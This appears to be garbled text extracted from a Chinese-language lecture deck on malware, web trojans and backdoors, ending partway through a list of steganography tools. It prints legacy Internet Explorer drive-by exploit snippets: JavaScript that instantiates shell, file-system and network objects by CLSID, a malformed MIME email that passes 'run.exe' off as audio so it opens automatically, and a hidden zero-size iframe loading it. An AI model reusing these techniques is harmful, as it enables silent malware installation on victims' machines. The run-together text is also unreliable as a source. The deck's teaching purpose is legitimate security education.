网络安全后门教程PPT课件

.,恶意软件（病毒）的分析与防范Defencex.asp;x.htm,.,x.htm,数据装载中，可能需要10秒至30秒.,.,x.asp,1-在cache中寻找1.bmp2-把bmp还原为exe3-执行exe,.,正常网页中携带,Window.openOnload,onerror,.,网页病毒、网页木马的原理,Javascript.Exception.Exploit：JS+WSH错误的MIMEMultipurposeInternetMailExtentions，多用途的网际邮件扩充协议头.IE5.0到IE6.0EXEto.BMP+Javascritp.Exception.Exploitiframe漏洞的利用：父窗口能在子域环境下运行脚本代码，包括任意的恶意代码通过安全认证的CAB,COXEXE文件的捆绑,.,Javascript.Exception.Exploit,Functiondestroy()trya1=document.applets0;a1.setCLSID(F935DC22-1CF0-11D0-ADB9-00C04FD58A0B);a1.createInstance();Shl=a1.GetObject();a1.setCLSID(0D43FE01-F093-11CF-8940-00A0C9054228);a1.createInstance();FSO=a1.GetObject();a1.setCLSID(F935DC26-1CF0-11D0-ADB9-00C04FD58A0B);a1.createInstance();Net=a1.GetObject();trydosomething;catch(e)catch(e)functiondo()setTimeout(destroy(),1000);/设定运行时间1秒do()/坏事执行函数指令,.,错误的MIMEMultipurposeInternetMailExtentions,Content-Type:multipart/related;type=multipart/alternative“;boundary=”=B=“-=B=Content-Type:multipart/alternative;boundary=”=A=“-=A=Content-Type:text/html;Content-Transfer-Encoding:quoted-printable-=A=-=B=Content-Type:audio/x-wav;name=”run.exe“-可以改为其他脚本文件Content-Transfer-Encoding:base64Content-ID:-以下省略AAAAAN+1个-,当申明邮件的类型为audio/x-wav时，IE存在的一个漏洞会将附件认为是音频文件自动尝试打开,.,iframe,iframesrc=run.emlwidth=0height=0/iframe,.,Startup.html,startupdocument.getElementById(clientcall).click(),.,HTA的全名为HTMLApplication,参见x.asp,.,各种溢出型漏洞,iframe溢出Javaprxy.DLLCOM对象堆溢出漏洞,.,木马的发展,加入Rootkit,隐藏文件/端口/服务/进程等HTTP隧道HyDan(把信息隐藏在二进制文件中),.,)Then%hiddendatacanbedirectlyreadoffanaudioCD.Includesencryption.DataPrivacyTools(Freeware)UsesBMPcarrierfilesandincludesencryption.,.,Hideinformationinafile,DataStash(Shareware)-UsesBMPanddatabasecarrierfilesandincludespasswordprotection.DigitalPictureEnvelopev1.0(Freeware)-UsesBMPcarrierfiles.EncryptPic(Shareware)-Uses24-bitBMPcarrierfilesandincludesencryption.Gif-it-Up(Freeware)-UsesGIFcarrierfilesandincludesencryption.Gifshufflev2.0(Freeware)-Acommand-linetoolthatusesGIFcarrierfilesandincludesencryption.HermeticStego(Shareware)-UsesBMPcarrierfiles.Thedevelopersclaimtheirstegokeymakesthepayloadundetectable.HideandSeekforWin95(Shareware)-UsesBMPcarrierfilesandincludesencryptionandfilewiping.Hide4PGPv2.0(Freeware)-Acommand-linetoolthatusesBMP,WAV,andVOCcarrierfiles.HideInPicture2.0(Freeware)-USesBMPcarrierfilesandincludesencryption.ImageHide(Freeware)-Usesavarietyofimagecarrierfiles.InPlainView(Freeware)-UsesBMPcarrierfilesandincludespasswordprotection.InThePicture(Shareware)-UsesBMPcarrierfilesandincludesencryption.,.,InfoStego(Freeware)-UsesBMPcarrierfiles;includesencryption.InvisibleSecretsv4.0(Shareware)-UsesJPEG,PNG,BMP,HTMLandWAVcarrierfiles.Includesencryption,shredder,passwordmanagerandself-decryptingarchives.JPegX(Freeware)-UsesJPEGcarrierfilesandincludesencryptionandpasswordprotection.JPHideandSeek(Freeware)-UsesJPEGcarrierfilesandincludesencryption.JStegShellv2.0(Freeware)-UsesJPEGcarrierfiles;includesencryption.MP3Stego(Freeware)-UsesMP3carrierfiles.PGPn123(Freeware)-AtoolthatfacilitatesusingPGPforEudora,Agent,orPegasusMailandalsoincludesasteganographyoption.PhotoCrypt1.1(Freeware)-UsesBMPcarrierfiles.SamsBigPlayMaker(Freeware)-Atextgenerationtoolthatconvertsamessageintoanoutputthatlookslikeaplay.Scramdisk(Freeware)-Adiskencryptionprogramthatallowsthecreationanduseofvirtualencrypteddrives.Scytale32bit(Freeware)-APGPshellprogramthatusesPCXcarrierfiles.SecurEngine4.0(Freeware)-UsesBMP,JPEG,WAV,andtxtfilesascarrierfiles.Includesencryption,filewiping,apasswordmanager,andself-decryptingarchives.Stash-Itv1.1(Freeware)-UsesBMP,GIF,TIFF,PNGorPCXcarrierfiles.Steghide0.4.6b(Freeware)-UsesBMP,WAVandAUcarrierfiles.Includesencryption.Stego-Lame(Freeware)-Usesvariousaudioformatsascarrierfiles.WritteninWindowsCsourcecode;mustbecompiledbeforeuse.S-Tools4-(Freeware)-UsesBMP,GIF,andWAVcarrierfiles;includespasswordandencryptionoptions.TheThirdEye(Freeware)-UsesBMP,GIF,andPCXcarrierfile